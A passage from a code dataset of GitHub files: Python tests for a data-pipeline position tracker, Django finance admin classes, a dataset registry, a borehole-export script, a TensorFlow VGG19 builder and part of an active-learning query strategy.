TestPositionDataTracker(BasePositionDataTrackerTest):\n @pytest.fixture\n def tracker(self):\n return PositionDataTracker()\n\n @pytest.fixture\n def position_info(self):\n return {0: 10}\n\n def test_publishing_message_sets_position_info(self, tracker, position_info):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info=position_info),\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info == position_info\n assert position_data.topic_to_last_position_info_map == {self.topic: position_info}\n\n def test_publishing_message_without_position_info_clears_position_info(self, tracker):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info={0: 10}),\n self._create_message(upstream_position_info=None)\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info is None\n assert position_data.topic_to_last_position_info_map == {self.topic: None}\n\n def test_publishing_message_when_skipping_unset_position_info(self, tracker, position_info):\n with reconfigure(skip_position_info_update_when_not_set=True):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info=position_info),\n self._create_message(upstream_position_info=None)\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info == position_info\n assert position_data.topic_to_last_position_info_map == {self.topic: position_info}\n\n def test_publishing_message_with_different_position_info_keys(self, tracker):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info={0: 10}),\n self._create_message(upstream_position_info={1: 12})\n ])\n position_data = tracker.get_position_data()\n assert position_data.last_published_message_position_info == {1: 12}\n assert position_data.topic_to_last_position_info_map == {self.topic: {1: 12}}\n\n\nclass TestMergingPositionDataTracker(BasePositionDataTrackerTest):\n @pytest.yield_fixture\n def tracker(self):\n with reconfigure(\n skip_position_info_update_when_not_set=True,\n merge_position_info_update=True\n ):\n yield PositionDataTracker()\n\n def test_publishing_with_merged_position_info(self, tracker):\n self._publish_messages(tracker, [\n self._create_message(upstream_position_info={0: 10}),\n self._create_message(upstream_position_info=None),\n self._create_message(upstream_position_info={0: 12, 1: 14}),\n self._create_message(upstream_position_info={1: 18, 2: 20}),\n ])\n position_data = tracker.get_position_data()\n expected_position_info = {0: 12, 1: 18, 2: 20}\n assert position_data.last_published_message_position_info == expected_position_info\n assert position_data.topic_to_last_position_info_map == {self.topic: expected_position_info}\n","repo_name":"Yelp/data_pipeline","sub_path":"tests/_position_data_tracker_test.py","file_name":"_position_data_tracker_test.py","file_ext":"py","file_size_in_byte":6404,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"51"} +{"seq_id":"40732807103","text":"from django.contrib import admin, messages\nfrom django.http import JsonResponse\nfrom django.urls import path\nfrom django.utils.html import format_html\nfrom django.utils.translation import ngettext\n\nfrom ebos2201.admin.a01_core_mas import T01BaseAdmin\nfrom ebos2210.admin.a10_fin_link import T10Gld10Admin, T10Gld11Inline\n\nfrom ..forms.f10_fin_gl import *\nfrom ..forms.f10_fin_main import (\n 
T10Abr10Form,\n T10Alc10Form,\n T10Gla10Form,\n T10Jvm10Form,\n T10Tic10Form,\n T10Tic11Form,\n)\nfrom ..formset import T10Alc11InlineFormSet, T10Alc12InlineFormSet\nfrom ..models.m10_fin_gl import *\nfrom ..models.m10_fin_link import *\nfrom ..views import *\n\n\nclass T10Jvm10Admin(T10Gld10Admin):\n list_display = (\n \"vou_type\",\n \"vou_num\",\n \"vou_date\",\n \"amount\",\n \"comment1\",\n \"comment2\",\n \"post_flag\",\n \"delete_flag\",\n \"division\",\n \"print_pdf\",\n )\n list_display_links = (\n \"vou_type\",\n \"vou_num\",\n \"vou_date\",\n \"amount\",\n \"comment1\",\n \"comment2\",\n \"post_flag\",\n \"delete_flag\",\n \"division\",\n )\n fields = (\n \"prg_type\",\n (\"division\", \"vou_type\", \"vou_curr\"),\n (\"vou_date\", \"vou_num\", \"vou_hdr_ref\"),\n \"comment1\",\n \"comment2\",\n )\n form = T10Jvm10Form\n inlines = [T10Gld11Inline]\n vou_type = \"JVM\"\n change_form_template = \"ebos2210/admin/t10_jvm_ap_ar_change_form.html\"\n\n\nadmin.site.register(T10Jvm10, T10Jvm10Admin)\n\n\nclass T10Unp10Admin(T10Gld10Admin):\n list_filter = (\"division\", \"vou_type\")\n vou_type = \"UNP\"\n inlines = [T10Gld11Inline]\n\n def has_add_permission(self, request, obj=None):\n return False\n\n\nadmin.site.register(T10Unp10, T10Unp10Admin)\n\n\nclass T10Alc11Inline(admin.TabularInline):\n model = T10Alc11\n formset = T10Alc11InlineFormSet\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Alc12Inline(admin.TabularInline):\n model = T10Alc12\n formset = T10Alc12InlineFormSet\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Alc10Admin(admin.ModelAdmin):\n form = T10Alc10Form\n list_display = (\n \"division\",\n \"vou_type\",\n \"vou_num\",\n \"vou_date\",\n \"subledger\",\n \"date_choice\",\n \"date_from\",\n \"date_to\",\n \"cr_date_from\",\n \"cr_date_upto\",\n \"alloc_lock_flag\",\n )\n fields = (\n \"prg_type\",\n (\"division\", \"vou_type\", \"vou_date\"),\n (\"subledger\", \"coa\", \"vou_num\"),\n (\"date_from\", \"date_to\", \"alloc_lock_flag\"),\n (\n \"cr_date_from\",\n \"cr_date_upto\",\n ),\n )\n inlines = [T10Alc11Inline, T10Alc12Inline]\n readonly_fields = (\"alloc_lock_flag\", \"vou_num\")\n change_form_template = \"ebos2210/admin/t10_allocation_change_form.html\"\n\n def get_readonly_fields(self, request, obj=None):\n if obj: # editing an existing object\n return (\n \"division\",\n \"vou_type\",\n \"vou_date\",\n \"subledger\",\n \"coa\",\n \"date_choice\",\n \"date_from\",\n \"date_to\",\n \"cr_date_from\",\n \"cr_date_upto\",\n ) + self.readonly_fields\n return self.readonly_fields\n\n def has_change_permission(self, request, obj=None):\n if obj and obj.alloc_lock_flag:\n return False\n return True\n\n class Media:\n css = {\n \"all\": (\n \"css/admin.css\",\n \"css/inline-grid.css\",\n ),\n }\n\n # url to get division data\n def get_urls(self):\n urls = super().get_urls()\n custom_urls = [\n path(\"add/fetch_t10cfg10//\", self.get_division),\n ]\n return custom_urls + urls\n\n # function to fetch division data\n def get_division(self, request, division):\n div_curr = T01Div10.objects.get(id=division).currency\n result = {\"division_curr\": div_curr.id, \"base_curr\": div_curr.currency_name}\n\n return JsonResponse(result)\n\n # On add form fill vou_date as current date\n def get_changeform_initial_data(self, request):\n\n return {\n \"vou_date\": 
date.today(),\n }\n\n\n# First Child Model -- Proxy Models\n\n\nclass T10Tb01Admin(T01BaseAdmin):\n list_display = (\n \"division\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"csv_button\",\n \"pdf_button\",\n )\n exclude = (\"rpt_code\", \"day\", \"company\", \"as_of_date\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Ctb01Admin(admin.ModelAdmin):\n list_display = (\"company\", \"type_of_rpt\", \"year\", \"month\", \"csv_button\")\n exclude = (\"rpt_code\", \"day\", \"division\", \"file_pdf\")\n readonly_fields = [\"file_csv\"]\n\n class Media:\n css = {\n \"all\": (\"css/admin.css\",),\n }\n js = (\"admin/js/common.js\",)\n\n def csv_button(self, obj):\n return format_html(\n \"Download\",\n settings.SITE_DOMAIN + settings.MEDIA_URL + str(obj.file_csv),\n )\n\n csv_button.short_description = \"CSV file\"\n\n\nclass T10Bs01Admin(T01BaseAdmin):\n list_display = (\n \"division\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"csv_button\",\n \"pdf_button\",\n )\n exclude = (\"rpt_code\", \"day\", \"company\", \"as_of_date\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Pl01Admin(T01BaseAdmin):\n list_display = (\n \"division\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"csv_button\",\n \"pdf_button\",\n )\n exclude = (\"rpt_code\", \"day\", \"company\", \"as_of_date\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Tbc01Admin(T01BaseAdmin):\n list_display = (\"division\", \"year\", \"month\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"company\", \"file_csv\", \"as_of_date\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10CshFlow01Admin(T01BaseAdmin):\n list_display = (\"division\", \"year\", \"month\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"company\", \"file_csv\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10TbDt01Admin(T01BaseAdmin):\n list_display = (\"division\", \"as_of_date\", \"csv_button\", \"pdf_button\")\n exclude = (\n \"rpt_code\",\n \"type_of_rpt\",\n \"year\",\n \"month\",\n \"day\",\n \"company\",\n )\n readonly_fields = (\n \"file_csv\",\n \"file_pdf\",\n )\n\n\nclass T10BsDt01Admin(T01BaseAdmin):\n list_display = (\"division\", \"as_of_date\", \"csv_button\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"year\", \"month\", \"company\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10PlDt01Admin(T01BaseAdmin):\n list_display = (\"division\", \"as_of_date\", \"csv_button\", \"pdf_button\")\n exclude = (\"rpt_code\", \"type_of_rpt\", \"day\", \"company\", \"year\", \"month\")\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\n# Second Child Model -- Proxy Models\n\n\nclass T10GlrB01Admin(T01BaseAdmin):\n form = T10GlrB01Form\n list_display = (\n \"division\",\n \"coa\",\n \"subledger\",\n \"dt_from\",\n \"dt_upto\",\n \"csv_button\",\n \"pdf_button\",\n )\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nclass T10Glc01Admin(T01BaseAdmin):\n form = T10Glc01Form\n list_display = (\"division\", \"coa\", \"subledger\", \"dt_from\", \"dt_upto\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10Stm01Admin(T01BaseAdmin):\n form = T10Stm01Form\n list_display = (\n \"division\",\n \"subledger\",\n \"vou_curr\",\n \"dt_from\",\n \"dt_upto\",\n \"pdf_button\",\n )\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10Stm02Admin(T01BaseAdmin):\n form = T10Stm02Form\n list_display = (\n \"division\",\n \"subledger\",\n \"vou_curr\",\n \"dt_from\",\n \"dt_upto\",\n \"pdf_button\",\n )\n readonly_fields = 
[\"file_pdf\"]\n\n\nclass T10Dbk01Admin(T01BaseAdmin):\n list_display = (\"division\", \"dt_from\", \"dt_upto\", \"pdf_button\")\n exclude = (\n \"rpt_code\",\n \"coa\",\n \"subledger\",\n \"vou_curr\",\n \"aging1\",\n \"aging2\",\n \"aging3\",\n \"file_csv\",\n )\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10SlCoa01Admin(T01BaseAdmin):\n form = T10SlCoa01Form\n list_display = (\"division\", \"dt_upto\", \"coa\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10SlCoa02Admin(T01BaseAdmin):\n form = T10SlCoa02Form\n list_display = (\"division\", \"dt_from\", \"dt_upto\", \"coa\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10LdgAcc01Admin(T01BaseAdmin):\n form = T10LdgAcc01Form\n list_display = (\"division\", \"dt_upto\", \"subledger\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10ChrAcc01Admin(T01BaseAdmin):\n form = T10ChrAcc01Form\n list_display = (\"division\", \"dt_upto\", \"coa\", \"pdf_button\")\n readonly_fields = [\"file_pdf\"]\n\n\nclass T10AgRpt01Admin(T01BaseAdmin):\n form = T10AgRpt01Form\n list_display = (\n \"division\",\n \"dt_upto\",\n \"subledger\",\n \"aging1\",\n \"aging2\",\n \"aging3\",\n \"csv_button\",\n \"pdf_button\",\n )\n readonly_fields = (\"file_csv\", \"file_pdf\")\n\n\nadmin.site.register(T10Tb01, T10Tb01Admin)\nadmin.site.register(T10Ctb01, T10Ctb01Admin)\nadmin.site.register(T10Bs01, T10Bs01Admin)\nadmin.site.register(T10Pl01, T10Pl01Admin)\nadmin.site.register(T10Tbc01, T10Tbc01Admin)\nadmin.site.register(T10CshFlow01, T10CshFlow01Admin)\nadmin.site.register(T10TbDt01, T10TbDt01Admin)\nadmin.site.register(T10BsDt01, T10BsDt01Admin)\nadmin.site.register(T10PlDt01, T10PlDt01Admin)\nadmin.site.register(T10GlrB01, T10GlrB01Admin)\nadmin.site.register(T10Glc01, T10Glc01Admin)\n# admin.site.register(T10Alc10, T10Alc10Admin)\nadmin.site.register(T10Stm01, T10Stm01Admin)\nadmin.site.register(T10Stm02, T10Stm02Admin)\nadmin.site.register(T10Dbk01, T10Dbk01Admin)\nadmin.site.register(T10SlCoa01, T10SlCoa01Admin)\nadmin.site.register(T10SlCoa02, T10SlCoa02Admin)\nadmin.site.register(T10LdgAcc01, T10LdgAcc01Admin)\nadmin.site.register(T10ChrAcc01, T10ChrAcc01Admin)\nadmin.site.register(T10AgRpt01, T10AgRpt01Admin)\nadmin.site.register([T10Cfg10, T10Wor10])\n\n\n# Financial year closing\nclass T10Fyc10Admin(admin.ModelAdmin):\n fields = [\n \"division\",\n \"gl_code\",\n \"closing_year\",\n \"closing_opt\",\n \"vou_hdr_ref\",\n \"net_profit_loss\",\n ]\n readonly_fields = [\"net_profit_loss\"]\n list_display = [\"division\", \"closing_year\", \"closing_opt\", \"net_profit_loss\"]\n\nadmin.site.register(T10Fyc10, T10Fyc10Admin)\n\n\nclass T10Gla10Admin(T10Alc10Admin, T01BaseAdmin):\n form = T10Gla10Form\n exclude = [\n \"currency\",\n \"hdr_comment\",\n \"issued_to\",\n \"tot_amount\",\n \"line_narration\",\n \"chq_num\",\n \"chq_date\",\n ]\n actions = [\"print_alc_rpt\"]\n\n \"\"\" Print Allocation Report custom action functionality \"\"\"\n\n def print_alc_rpt(self, request, queryset):\n try:\n gl_alloc = queryset[0]\n gl_alloc_rpt = GlAllocRpt()\n gl_alloc_rpt.init_pdf(gl_alloc)\n # passing debit details\n for db_detail in T10Alc11.objects.filter(alloc_id=gl_alloc.id):\n gl11_detail = T10Gld11.objects.get(id=db_detail.debit_id)\n gl_alloc_rpt.render_details(db_detail, gl11_detail, \"debit\")\n # passing credit details\n for cr_detail in T10Alc12.objects.filter(alloc_id=gl_alloc.id):\n gl11_detail = T10Gld11.objects.get(id=cr_detail.credit_id)\n gl_alloc_rpt.render_details(cr_detail, gl11_detail, \"credit\")\n 
return gl_alloc_rpt.print_pdf(gl_alloc)\n except Exception as e:\n self.message_user(request, \"No record found\", messages.ERROR)\n\n print_alc_rpt.short_description = \"Print Allocation Report\"\n\n\nadmin.site.register(T10Gla10, T10Gla10Admin)\n\n\nclass T10Brc11Inline(admin.TabularInline):\n model = T10Brc11\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def get_readonly_fields(self, request, obj=None):\n if obj: # editing an existing object\n return self.readonly_fields + (\n \"bank_reco_id\",\n \"gl_id\",\n \"gl_date\",\n \"gl_debit\",\n \"gl_credit\",\n \"narration\",\n \"chq_num\",\n \"chq_date\",\n )\n return self.readonly_fields\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Brc12Inline(admin.TabularInline):\n model = T10Brc12\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nclass T10Brc10Admin(T01BaseAdmin):\n list_display = (\"division\", \"bank_account\", \"date_from\", \"date_to\")\n inlines = [T10Brc11Inline]\n readonly_fields = (\"opening_gl_bal\", \"closing_gl_bal\", \"reco_gl_bal\")\n change_form_template = \"ebos2210/admin/t10_bank_reco_change_form.html\"\n\n def get_readonly_fields(self, request, obj=None):\n readonly_fields = super().get_readonly_fields(request, obj)\n if obj: # editing an existing object\n return (\n \"division\",\n \"bank_account\",\n \"date_from\",\n \"date_to\",\n \"opening_gl_bal\",\n \"closing_gl_bal\",\n \"reco_gl_bal\",\n \"opening_stmt_bal\",\n \"closing_stmt_bal\",\n \"import_bank_stmt\",\n )\n return readonly_fields\n\n\nclass T10Mbr10Admin(T10Brc10Admin):\n fields = (\n (\"division\", \"bank_account\"),\n (\"date_from\", \"date_to\"),\n (\"opening_gl_bal\", \"opening_stmt_bal\"),\n )\n exclude = (\n \"proxy_code\",\n \"import_bank_stmt\",\n )\n\n\nadmin.site.register(T10Mbr10, T10Mbr10Admin)\n\n\nclass T10Abr10Admin(T10Brc10Admin):\n form = T10Abr10Form\n fields = (\n (\"division\", \"bank_account\"),\n (\"date_from\", \"date_to\"),\n (\"opening_gl_bal\", \"opening_stmt_bal\"),\n \"import_bank_stmt\",\n )\n\n def get_inlines(self, request, obj):\n inlines = super().get_inlines(request, obj)\n return inlines + [T10Brc12Inline]\n\n\nadmin.site.register(T10Abr10, T10Abr10Admin)\n\n# Transfer Account Balance & Intercompany posting\nclass T10Tic11Admin(admin.TabularInline):\n model = T10Tic11\n readonly_fields = [\"to_amt\", \"alloc_date\"]\n form = T10Tic11Form\n extra = 1\n\n\nclass T10Tic10Admin(admin.ModelAdmin):\n form = T10Tic10Form\n readonly_fields = [\"from_amt\", \"flag_db_cr\"]\n inlines = [T10Tic11Admin]\n actions = [\"post_intercompany_balance\"]\n change_form_template = \"ebos2210/admin/t10_intercompany_change_form.html\"\n\n def get_division_data(self, request, company):\n divisions = list(\n T01Div10.objects.filter(company_id=company).values(\"id\", \"division_name\")\n )\n return JsonResponse({\"divisions\": divisions})\n\n def get_coa_sl_data(self, request, division):\n coas = list(\n T01Coa10.objects.filter(division_id=division, coa_control=\"2\").values(\n \"id\", \"account_name\"\n )\n )\n subledgers = list(\n T01Sld10.objects.filter(division_id=division).values(\"id\", \"subledger_name\")\n )\n\n return JsonResponse({\"coas\": coas, \"subledgers\": subledgers})\n\n def get_urls(self):\n urls = super().get_urls()\n custom_urls = [\n path(\"add/get_division//\", self.get_division_data),\n 
path(\"add/get_coa_sl//\", self.get_coa_sl_data),\n ]\n return custom_urls + urls\n\n \"\"\"Intercompany / division balance posting custom action functionality\"\"\"\n\n @admin.action(description=\"Post intercompany / division balance\")\n def post_intercompany_balance(self, request, queryset):\n posted = 0\n intercom_list = []\n\n for q in queryset:\n if q.from_amt == 0:\n intercom_list.append(q.ic_coa)\n else:\n if q.post_intercompany_balance():\n posted += 1\n\n if posted > 0:\n self.message_user(\n request,\n ngettext(\n \"%d successfully posted.\",\n \"%d successfully posted.\",\n posted,\n )\n % posted,\n messages.SUCCESS,\n )\n else:\n self.message_user(request, \"Something wrong\", messages.ERROR)\n\n if intercom_list.exists():\n intercom_str = \",\".join(intercom_list)\n self.message_user(\n request,\n f\"Zero amount, nothing to allocate for {intercom_str}\",\n messages.ERROR,\n )\n\n\nadmin.site.register(T10Tic10, T10Tic10Admin)\n","repo_name":"KripKrop72724/ebos_replicate","sub_path":"ebos2210/admin/a10_fin_gl.py","file_name":"a10_fin_gl.py","file_ext":"py","file_size_in_byte":17228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10817502627","text":"import importlib\nimport inspect\nfrom collections import OrderedDict\nfrom pathlib import Path\nfrom typing import NamedTuple, Type\n\nimport pandas as pd\n\nfrom .licenses import License\n\n\n_REGISTRY = {}\n\n\nclass Description(NamedTuple):\n body_region: str = None\n license: str = None\n link: str = None\n modality: str = None\n prep_data_size: str = None\n raw_data_size: str = None\n task: str = None\n\n\ndef register(**kwargs):\n def decorator(cls: Type):\n name = cls.__name__\n module = inspect.getmodule(inspect.stack()[1][0]).__name__\n assert name not in _REGISTRY, name\n _REGISTRY[name] = cls, module, description\n return cls\n\n description = Description(**kwargs)\n return decorator\n\n\ndef gather_datasets():\n for f in Path(__file__).resolve().parent.parent.iterdir():\n module_name = f'amid.{f.stem}'\n importlib.import_module(module_name)\n\n return OrderedDict((k, _REGISTRY[k]) for k in sorted(_REGISTRY))\n\n\ndef prepare_for_table(name, cls, module, description, version):\n def stringify(x):\n if pd.isnull(x):\n return ''\n if isinstance(x, str):\n return x\n if isinstance(x, (list, tuple)):\n return ', '.join(x)\n return x\n\n entry = {'name': name, 'entries': len(cls().ids)}\n entry.update({k: v for k, v in description._asdict().items() if not pd.isnull(v)})\n license_ = entry.get('license', None)\n if license_:\n if isinstance(license_, License):\n license_ = f'{license_.name}'\n entry['license'] = license_\n\n link = entry.pop('link', None)\n if link is not None:\n entry['link'] = f'Source'\n\n entry['name'] = f'{name}'\n return {k: stringify(v) for k, v in entry.items()}\n","repo_name":"neuro-ml/amid","sub_path":"amid/internals/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"51"} +{"seq_id":"15127372291","text":"import geopandas as gpd\nimport pandas as pd\n\ninfile = r\"output\\UDF_Boreholes.gpkg\"\n\ngdf = gpd.read_file(infile, layer='UDF_Bores').to_crs(\"epsg:28355\")\n\ngdf['X'] = [g.x for g in gdf.geometry]\ngdf['Y'] = [g.y for g in gdf.geometry]\n\ndf_export = gdf[['HydroCode', 'HydroID', 'X', 'Y', 'GALandElev', 'DrilledDepth']]\n\n\nmask = pd.isnull(df_export.HydroCode)\n\nmissing_names = 
gdf[mask]['BoreName'].values\n\ndf_export.at[df_export[mask].index, \"HydroCode\"] = missing_names\n\ndf_export.fillna(0).to_csv(r\"output\\UDF_headers.txt\", sep = \"\\t\", index = False)\n\n# now export the well tops\n\ngdf_bl = gpd.read_file(infile, layer='UDF_BoreLog')\n\n# join to get the coordinates\n\ndf_bl_export = gdf_bl.merge(gdf[['HydroID', 'X', 'Y']], left_on=\"BoreID\", right_on=\"HydroID\")[['BoreID', 'HydroCode', 'FromDepth', 'GA_UNIT', \"X\", \"Y\", \"TopElev\"]]\n\nmask = pd.notnull(df_bl_export.GA_UNIT)\n\n# export\ndf_bl_export[mask].to_csv(r\"output\\UDF_formation_top.txt\", sep = \"\\t\", index = False)\n\n# now we export lithlogs\n\n\ngdf_ll = gpd.read_file(infile, layer='UDF_LithologyLog')\n\ndf_ll_export = gdf_ll.merge(gdf[['HydroID', 'X', 'Y']], left_on=\"BoreID\", right_on=\"HydroID\")[['BoreID', 'HydroCode', 'FromDepth', \"ToDepth\", 'GALithType', 'MajorLithCode', 'MinorLithCode', 'Description', \"X\", \"Y\", \"TopElev\"]]\n\ndf_ll_export.fillna(\"\", inplace=True)\n\n# export\ndf_ll_export.to_csv(r\"output\\UDF_lithlog.txt\", sep = \"\\t\", index = False)\n\n","repo_name":"Neil-Symington/UDF_boreholde_data","sub_path":"scripts/boreholedb2petrel.py","file_name":"boreholedb2petrel.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9257910573","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef build(shape, pool_method, pool_stride):\n \"\"\"\n input image is rgb image [batch, height, width, 3]\n Load params of VGG19 trained on imagenet; the params are downloaded from\n https://github.com/machrisaa/tensorflow-vgg as numpy compressed (npz) file\n \"\"\"\n params = np.load('vgg19.npy', encoding='latin1').item()\n\n def _pool(input_, name, method, stride):\n if method == 'avg':\n return tf.nn.avg_pool(input_,\n ksize=[1, stride, stride, 1],\n strides=[1, stride, stride, 1],\n padding='SAME',\n name=name)\n elif method == 'max':\n return tf.nn.max_pool(input_,\n ksize=[1, stride, stride, 1],\n strides=[1, stride, stride, 1],\n padding='SAME',\n name=name)\n else:\n raise ValueError('Invalid pool_method')\n\n def _conv_layer(input_, name):\n kernel = tf.constant(params[name][0], name='kernel')\n bias = tf.constant(params[name][1], name='bias')\n\n conv_output = tf.nn.conv2d(input_, kernel,\n strides=[1, 1, 1, 1], padding='SAME')\n relu_output = tf.nn.relu(conv_output + bias)\n return relu_output\n\n graph = {}\n shape = np.zeros((1, shape[0], shape[1], 3))\n graph['input'] = tf.Variable(shape, dtype=tf.float32)\n graph['conv1_1'] = _conv_layer(graph['input'], 'conv1_1')\n graph['conv1_2'] = _conv_layer(graph['conv1_1'], 'conv1_2')\n graph['pool1'] = _pool(graph['conv1_2'], 'pool1', pool_method, pool_stride)\n\n graph['conv2_1'] = _conv_layer(graph['pool1'], 'conv2_1')\n graph['conv2_2'] = _conv_layer(graph['conv2_1'], 'conv2_2')\n graph['pool2'] = _pool(graph['conv2_2'], 'pool2', pool_method, pool_stride)\n\n graph['conv3_1'] = _conv_layer(graph['pool2'], 'conv3_1')\n graph['conv3_2'] = _conv_layer(graph['conv3_1'], 'conv3_2')\n graph['conv3_3'] = _conv_layer(graph['conv3_2'], 'conv3_3')\n graph['conv3_4'] = _conv_layer(graph['conv3_3'], 'conv3_4')\n graph['pool3'] = _pool(graph['conv3_4'], 'pool3', pool_method, pool_stride)\n\n graph['conv4_1'] = _conv_layer(graph['pool3'], 'conv4_1')\n graph['conv4_2'] = _conv_layer(graph['conv4_1'], 'conv4_2')\n graph['conv4_3'] = _conv_layer(graph['conv4_2'], 'conv4_3')\n graph['conv4_4'] = _conv_layer(graph['conv4_3'], 
'conv4_4')\n    graph['pool4'] = _pool(graph['conv4_4'], 'pool4', pool_method, pool_stride)\n\n    graph['conv5_1'] = _conv_layer(graph['pool4'], 'conv5_1')\n    graph['conv5_2'] = _conv_layer(graph['conv5_1'], 'conv5_2')\n    graph['conv5_3'] = _conv_layer(graph['conv5_2'], 'conv5_3')\n    graph['conv5_4'] = _conv_layer(graph['conv5_3'], 'conv5_4')\n    graph['pool5'] = _pool(graph['conv5_4'], 'pool5', pool_method, pool_stride)\n\n    return graph\n","repo_name":"ek-ok/neural-artistist","sub_path":"vgg19.py","file_name":"vgg19.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42218609814","text":"\"\"\"Maximum loss reduction with Maximal Confidence (MMC)\n\"\"\"\nimport copy\n\nimport numpy as np\nfrom sklearn.svm import SVC\n\nfrom libact.base.dataset import Dataset\nfrom libact.base.interfaces import QueryStrategy, ContinuousModel\nfrom libact.utils import inherit_docstring_from, seed_random_state, zip\nfrom libact.models import LogisticRegression, SklearnProbaAdapter\nfrom libact.models.multilabel import BinaryRelevance, DummyClf\n\n\nclass MaximumLossReductionMaximalConfidence(QueryStrategy):\n    r\"\"\"Maximum loss reduction with Maximal Confidence (MMC)\n\n    This algorithm is designed to use binary relevance with SVM as the base model.\n\n    Parameters\n    ----------\n    base_learner : :py:mod:`libact.query_strategies` object instance\n        The base learner for binary relevance, should support predict_proba\n\n    br_base : ProbabilisticModel object instance\n        The base learner for the binary relevance in MMC.\n        Should support predict_proba.\n\n    logreg_param : dict, optional (default={})\n        Sets the parameters for the logistic regression that is used to\n        predict the number of labels for a given feature vector. For parameter\n        details please refer to:\n        http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html\n\n    random_state : {int, np.random.RandomState instance, None}, optional (default=None)\n        If int or None, random_state is passed as a parameter to generate an\n        np.random.RandomState instance. If an np.random.RandomState instance is\n        given, it is used as the random number generator.\n\n    Attributes\n    ----------\n    logistic_regression\\_ : :py:mod:`libact.models.LogisticRegression` object instance\n        The model used to predict the number of labels in each instance.\n        Should support multi-class classification.\n\n    Examples\n    --------\n    Here is an example of declaring a MMC query_strategy object:\n\n    .. code-block:: python\n\n       from libact.query_strategies.multilabel import MMC\n       from sklearn.linear_model import LogisticRegression\n\n       qs = MMC(\n                dataset, # Dataset object\n                br_base=LogisticRegression()\n            )\n\n    References\n    ----------\n    .. [1] Yang, Bishan, et al. \"Effective multi-label active learning for text\n\t\t classification.\" Proceedings of the 15th ACM SIGKDD international\n\t\t conference on Knowledge discovery and data mining. 
ACM, 2009.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(MaximumLossReductionMaximalConfidence, self).__init__(*args, **kwargs)\n\n # self.n_labels = len(self.dataset.get_labeled_entries()[0][1])\n self.n_labels = len(self.dataset.get_labeled_entries()[1][0])\n\n random_state = kwargs.pop('random_state', None)\n self.random_state_ = seed_random_state(random_state)\n\n self.logreg_param = kwargs.pop('logreg_param',\n {'multi_class': 'multinomial',\n 'solver': 'newton-cg',\n 'random_state': random_state})\n self.logistic_regression_ = LogisticRegression(**self.logreg_param)\n\n self.br_base = kwargs.pop('br_base',\n SklearnProbaAdapter(SVC(kernel='linear',\n probability=True,\n gamma=\"auto\",\n random_state=random_state)))\n\n @inherit_docstring_from(QueryStrategy)\n def make_query(self):\n dataset = self.dataset\n labeled_pool, Y = dataset.get_labeled_entries()\n unlabeled_entry_ids, X_pool = dataset.get_unlabeled_entries()\n labeled_pool = np.array(labeled_pool)\n Y = np.array(Y)\n X_pool = np.array(X_pool)\n\n br = BinaryRelevance(self.br_base)\n br.train(Dataset(labeled_pool, Y))\n\n trnf = br.predict_proba(labeled_pool)\n poolf = br.predict_proba(X_pool)\n f = poolf * 2 - 1\n\n trnf = np.sort(trnf, axis=1)[:, ::-1]\n trnf /= np.tile(trnf.sum(axis=1).reshape(-1, 1), (1, trnf.shape[1]))\n if len(np.unique(Y.sum(axis=1))) == 1:\n lr = DummyClf()\n else:\n lr = self.logistic_regression_\n lr.train(Dataset(trnf, Y.sum(axis=1)))\n\n idx_poolf = np.argsort(poolf, axis=1)[:, ::-1]\n poolf = np.sort(poolf, axis=1)[:, ::-1]\n poolf /= np.tile(poolf.sum(axis=1).reshape(-1, 1), (1, poolf.shape[1]))\n pred_num_lbl = lr.predict(poolf).astype(int)\n\n yhat = -1 * np.ones((len(X_pool), self.n_labels), dtype=int)\n for i, p in enumerate(pred_num_lbl):\n 